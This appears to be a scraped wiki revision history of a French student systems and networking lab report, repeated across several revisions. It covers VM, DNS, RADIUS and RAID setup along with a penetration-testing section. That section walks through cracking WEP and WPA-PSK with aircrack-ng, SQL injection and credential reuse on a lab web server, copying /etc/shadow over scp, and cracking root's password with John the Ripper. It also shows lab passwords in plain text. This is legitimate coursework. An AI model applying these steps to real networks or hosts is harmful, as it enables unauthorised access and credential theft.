[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Sécurisation des données (RAID 5) =<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
= Chiffrement des données =<br />
<br />
a</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57692TP sysres IMA5 2021/2022 G62022-01-10T15:56:35Z<p>Bjacquot : /* Exploitation de failles du système */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password<br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Sécurisation des données (RAID 5) =<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
= Chiffrement des données =<br />
<br />
a</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57678TP sysres IMA5 2021/2022 G62022-01-10T15:47:34Z<p>Bjacquot : /* Gestion des certificats */</p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSh ==<br />
<br />
